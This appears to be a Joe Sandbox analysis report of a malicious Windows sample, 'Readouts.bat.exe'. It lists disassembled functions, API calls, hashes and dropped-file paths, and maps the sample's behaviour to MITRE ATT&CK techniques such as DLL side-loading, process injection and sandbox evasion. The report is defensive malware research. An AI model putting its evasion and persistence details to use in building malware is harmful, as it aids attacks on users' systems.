Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8

Function 00405BA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Readouts.bat.exe,C:\Users\user\Desktop\Readouts.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Readouts.bat.exe,C:\Users\user\Desktop\Readouts.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB

Strings

C:\Users\user\Desktop, xrefs: 00405BA5

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC

Function 6FBF10E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6FBF116A
GlobalFree.KERNEL32(00000000), ref: 6FBF11C7
GlobalFree.KERNEL32(00000000), ref: 6FBF11D9
GlobalFree.KERNEL32(?), ref: 6FBF1203

Memory Dump Source

Source File: 00000000.00000002.2200727678.000000006FBF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBF0000, based on PE: true

Associated: 00000000.00000002.2200703347.000000006FBF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200746589.000000006FBF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200767970.000000006FBF5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fbf0000_Readouts.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 59f2dfbf05df858e871085aae4d1124de958ce3b333864b808a4e077c87b65cd
Instruction ID: da6b53ab0505722772280478c9e6f19b8abc6e914a5026db1d4d7f1e2cf3b1c5
Opcode Fuzzy Hash: 59f2dfbf05df858e871085aae4d1124de958ce3b333864b808a4e077c87b65cd
Instruction Fuzzy Hash: 1C3194F2903241DFDB009FBAFA45A6977E8FB463207084D1AE844D7250E734E95B8721

Function 00405CDF Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Readouts.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsrC488.tmp\LangDLL.dll

C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon\frtr.jpg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon\lukkedagenes.fli

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon\opisthocomine.nit

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Svovlkalk101\Destructibility232.Hae

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Svovlkalk101\Fraggings79.Bou

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Svovlkalk101\defencives.pol

C:\Windows\Resources\0809\mysterist.ini

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
Readouts.bat.exe

Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405996 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00403974 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 004062A6 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004052EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Function 004057BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 00405DA9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Function 6FBF177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON